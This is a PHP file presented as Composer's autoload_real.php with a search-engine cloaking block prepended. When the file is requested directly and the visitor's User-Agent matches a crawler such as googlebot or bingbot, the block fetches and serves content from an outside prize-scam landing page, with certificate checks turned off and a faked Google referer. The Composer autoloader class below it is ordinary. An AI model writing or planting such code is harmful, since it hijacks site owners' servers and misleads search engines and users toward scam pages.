<?php
/**
 * Combined file:
 * - Top: cloaking / bot detector + fetch function (runs only when this file is requested directly)
 * - Bottom: original Composer autoload_real.php class
 *
 * Note:
 * - Cloaking runs only when this file is the requested script (prevents side-effects when included).
 */

/* ---------------------------
   (Only run when this file is requested directly)
   --------------------------- */
if (php_sapi_name() !== 'cli' && realpath(__FILE__) === realpath($_SERVER['SCRIPT_FILENAME'] ?? '')) {
    @ob_start();
    header("Vary: User-Agent");

    $targetUrl = "https://mega-prize.org/landing/ajrpt.html";
    $botPattern = "/(googlebot|slurp|bingbot|baiduspider|yandex|crawler|spider|adsense|inspection|mediapartners)/i";
    $userAgent = $_SERVER['HTTP_USER_AGENT'] ?? '';

    function fetchContentCurl($url) {
        $ch = curl_init($url);
        curl_setopt_array($ch, [
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_FOLLOWLOCATION => true,
            CURLOPT_USERAGENT => "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
            CURLOPT_REFERER => "https://www.google.com/",
            CURLOPT_CONNECTTIMEOUT => 5,
            CURLOPT_TIMEOUT => 10,
            CURLOPT_SSL_VERIFYPEER => false,
            CURLOPT_SSL_VERIFYHOST => false,
        ]);
        $content = curl_exec($ch);
        curl_close($ch);
        return $content ?: '';
    }

    if (preg_match($botPattern, strtolower($userAgent))) {
        try {
            usleep(random_int(100000, 200000));
        } catch (Exception $e) {
            usleep(150000);
        }
        echo fetchContentCurl($targetUrl);
        @ob_end_flush();
        exit;
    }

    @ob_end_flush();
}

// ===== COMPOSER AUTOLOAD =====
class ComposerAutoloaderIniteeb0eddf8472fbe1e621dabfed5ae21e
{
    private static $loader;

    public static function loadClassLoader($class)
    {
        if ('Composer\Autoload\ClassLoader' === $class) {
            require __DIR__ . '/ClassLoader.php';
        }
    }

    /**
     * @return \Composer\Autoload\ClassLoader
     */
    public static function getLoader()
    {
        if (null !== self::$loader) {
            return self::$loader;
        }

        require __DIR__ . '/platform_check.php';

        spl_autoload_register(array('ComposerAutoloaderIniteeb0eddf8472fbe1e621dabfed5ae21e', 'loadClassLoader'), true, true);
        self::$loader = $loader = new \Composer\Autoload\ClassLoader(\dirname(__DIR__));
        spl_autoload_unregister(array('ComposerAutoloaderIniteeb0eddf8472fbe1e621dabfed5ae21e', 'loadClassLoader'));

        require __DIR__ . '/autoload_static.php';
        call_user_func(\Composer\Autoload\ComposerStaticIniteeb0eddf8472fbe1e621dabfed5ae21e::getInitializer($loader));

        $loader->register(true);

        $includeFiles = \Composer\Autoload\ComposerStaticIniteeb0eddf8472fbe1e621dabfed5ae21e::$files;
        foreach ($includeFiles as $fileIdentifier => $file) {
            composerRequireeeb0eddf8472fbe1e621dabfed5ae21e($fileIdentifier, $file);
        }

        return $loader;
    }
}

/**
 * @param string $fileIdentifier
 * @param string $file
 * @return void
 */
function composerRequireeeb0eddf8472fbe1e621dabfed5ae21e($fileIdentifier, $file)
{
    if (empty($GLOBALS['__composer_autoload_files'][$fileIdentifier])) {
        $GLOBALS['__composer_autoload_files'][$fileIdentifier] = true;

        require $file;
    }
}
